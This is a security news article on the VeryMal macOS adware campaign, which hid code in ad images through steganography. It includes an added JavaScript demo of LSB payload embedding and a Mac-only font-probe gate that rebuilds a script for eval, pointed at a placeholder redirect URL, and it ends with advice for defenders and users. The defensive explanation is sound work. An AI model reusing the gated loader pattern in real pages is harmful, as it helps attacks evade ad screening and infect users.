Steganography, the centuries-old practice of concealing a message inside an innocuous carrier such as a picture or a text, has now been adopted by attackers to spread VeryMal, adware that installs fake advertisements on macOS computers. The lure is a fake Flash update, and the route that takes users to it is fairly bold.
The malware is delivered through legitimate advertising networks, from which the attackers bought ad space to guarantee distribution. The ad image carries hidden code that first checks whether fonts bundled with macOS are present, which is the case on most Macs. If they are, the code reconstructs the malicious script one character at a time, executes it, and redirects the victim to a fake Flash update page. If the user downloads and runs the installer, the computer is infected.
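The mechanism described above, as an added illustration rather than the actual VeryMal code: a text payload is hidden in the least-significant bit of each byte of an image buffer, a font probe decides whether the host looks like a Mac, and only then is the script rebuilt one character at a time. The carrier, the payload string, the font names and the `fontAvailable` probe are all constructed for the demo; in a real page the probe would measure canvas text widths and the pixel data would come from `ImageData.data`.

```javascript
// Added illustration of LSB image steganography gated on a platform probe.
// Not VeryMal's code: carrier, payload, font list and probe are constructed.

const TERMINATOR = 0; // a NUL byte marks the end of the hidden text

// Constructed carrier: a width*height RGBA buffer filled by a fixed-seed LCG,
// standing in for the ImageData.data a script would read from a canvas.
function makeCarrier(width, height) {
  const pixels = new Uint8Array(width * height * 4);
  let seed = 0x1234;
  for (let i = 0; i < pixels.length; i++) {
    seed = (Math.imul(seed, 1103515245) + 12345) >>> 0;
    pixels[i] = (seed >>> 16) & 0xff;
  }
  return pixels;
}

// Embed `text` (8-bit characters) in the low bit of successive bytes, MSB first.
function embedPayload(pixels, text) {
  const codes = [...text].map((ch) => ch.charCodeAt(0));
  if (codes.some((c) => c > 0xff)) throw new Error("payload must be 8-bit text");
  codes.push(TERMINATOR);
  if (codes.length * 8 > pixels.length) throw new Error("carrier too small");
  const out = Uint8Array.from(pixels);
  codes.forEach((code, i) => {
    for (let bit = 0; bit < 8; bit++) {
      const idx = i * 8 + bit;
      out[idx] = (out[idx] & 0xfe) | ((code >> (7 - bit)) & 1);
    }
  });
  return out;
}

// Rebuild the hidden text one character at a time, as a loader would before
// handing the result to eval()/Function().
function extractPayload(pixels) {
  let text = "";
  for (let i = 0; i + 8 <= pixels.length; i += 8) {
    let code = 0;
    for (let bit = 0; bit < 8; bit++) code = (code << 1) | (pixels[i + bit] & 1);
    if (code === TERMINATOR) return text;
    text += String.fromCharCode(code);
  }
  throw new Error("no terminator found: not a carrier, or payload truncated");
}

// Largest per-byte change the embedding made: this is why the stego image is
// visually identical to the original and why a plain image scan sees nothing.
function maxChannelDelta(a, b) {
  let max = 0;
  for (let i = 0; i < a.length; i++) max = Math.max(max, Math.abs(a[i] - b[i]));
  return max;
}

// Hypothetical fingerprint gate: decode only if every probed font renders.
// `fontAvailable` is injected so this runs outside a browser; in a page it
// would compare canvas text widths for each font name against a fallback font.
const MAC_FONT_PROBES = ["Helvetica Neue", "Menlo"]; // illustrative names only

function stageIfMac(pixels, fontAvailable) {
  if (!MAC_FONT_PROBES.every(fontAvailable)) return null; // stay dormant
  return extractPayload(pixels);
}

// Constructed payload: a redirect to a placeholder URL, not a real campaign URL.
const SAMPLE_PAYLOAD = "window.location.href='https://update.invalid/flash';";

const carrier = makeCarrier(64, 64);
const stego = embedPayload(carrier, SAMPLE_PAYLOAD);
console.log("max byte change:", maxChannelDelta(carrier, stego));
console.log("on a non-Mac probe:", stageIfMac(stego, () => false));
console.log("on a Mac-like probe:", stageIfMac(stego, () => true));
```

Two points for defenders follow from the demo. Every byte of the carrier changes by at most one, so the image passes any check that looks at the picture itself; the only reliable signal is behavioural, namely a script that reads pixel data from a canvas and feeds the result to `eval` or `Function`. And because the payload is never assembled on a non-Mac host, an ad-verification scanner running on Linux or Windows sees a benign image, which is exactly why the campaign slipped past the networks' own screening.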
The attackers chose this low-tech method to evade anti-virus software and the protections built into macOS itself: to a scanner, the ad is just an image until the hidden code is decoded on a suitable victim. Infected computers begin to display fake ads whose revenue goes straight to the attackers, and the adware even swaps out legitimate ads on websites, which makes it harder for users to notice that anything is wrong.
VeryMal itself was already known to security researchers, but the new distribution method has greatly increased its reach. According to Eliya Stein, the Confiant researcher who uncovered the campaign, at least five million users were exposed to the malicious ads in just two days. Users in the United States were the main targets, though the researcher could not say how many machines were actually infected.
The campaign ended as abruptly as it began, either because the advertising agreements with the distributors expired or because the abuse was detected and the ads were pulled. Considerable damage may nonetheless already have been done, which is why Confiant advises caution, particularly for users in the United States.
Ads that look out of place or odd, and unrelated to the user's browsing habits, are a useful warning sign of a possible infection. Keeping the operating system, browser and security software up to date also helps prevent such infections, as does refusing to click on suspicious ads or to install any "update" that suddenly appears inside a web page; Flash and other software should be updated only through the vendor's own channels.